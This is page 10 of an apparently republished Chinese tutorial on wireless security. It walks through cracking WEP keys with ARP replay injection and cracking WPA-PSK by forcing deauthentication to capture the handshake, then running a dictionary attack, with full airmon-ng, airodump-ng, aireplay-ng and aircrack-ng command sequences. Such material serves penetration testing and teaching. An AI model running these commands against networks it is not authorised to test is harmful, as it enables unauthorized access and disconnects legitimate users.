无线安全需要了解的芯片选型、扫描器使用知识

www.net130.com     日期:2014-6-3    浏览次数:
作者:LittleHann FreeBuf    出处:51CTO

0×2: 数据包注入

Google上有很多"WEP密码破解"、"WPA"、"WP2密码破解"、也有很多自动化工具(如wifite、fern-wifi-cracker),它们破解的原理就是数据包注入

使用Airodump-ng系列软件来进行无线数据包注入、密码破解

1. WEP

通过静默捕获IVS数据包,或主动注入ARP数据包(这是一种数据帧),加快当前信道中的流量来加速破解,最终的目的是捕获足够多的IVS数据包,从而利用RC4算法的缺陷来逆向出key

example:

ifconfig wlan1 up

airmon-ng start wlan1

airodump-ng mon0

airodump-ng --ivs -w longas -c 6 mon0

//这个时候理论上可以等待抓包抓到足够数量就可以了,但是为了加快抓包速度,可以采用arp注入的方式来加快抓包

//重新打开一个新的console,然后执行arp注入命令

aireplay-ng -3 -b 08:10:77:CF:C9:62 -h CC:AF:78:26:77:BD mon0

//抓包结束后,确保抓到了足够熟练的IVs包,开始破解

aircrack-ng longas-01.ivs

如果抓到的IVs包数量不够,会遇到破解失败,最好能抓到2W以上的包数量

2. WPA

通过主动注入Deanthentication/Disassociation数据包(它们属于管理帧,试图告诉AP某个客户端想断开连接,显然这并不是这个客户端的本意),来强制断开目标客户端和AP的Wi-Fi,连接,当目标试图和AP进行重连接的时候,黑客捕获握手4次包(Handshak Package),然后利用离线字典、或者彩虹表进行暴力破解

example:

ifconfig wlan0 up

airmon-ng start wlan0

airodump-ng mon0

//开始捕获无线数据包

airodump-ng --ivs -w longas -c 6 mon0

//另开一个console,进行Deauth攻击,为了捕获握手包

aireplay-ng -0 1 -a 08:10:77:CF:C9:62 -c CC:AF:78:26:77:BD mon0

//在右上角看到了 WPA handshake提示后,表示抓到了握手包,开始破解WPA-PSK

aircrack-ng -w /pentest/passwords/wordlists/test.lst longas-01.ivs

要注意的一点是,WEP中注入的是数据帧,而WPA破解中注入的是管理帧,关于IEEE802.11帧的格式,我在另一篇文章中总结了一下

http://www.cnblogs.com/LittleHann/p/3700357.html

 

本新闻共11页,当前在第10页  1  2  3  4  5  6  7  8  9  10  11  

分享道
相关新闻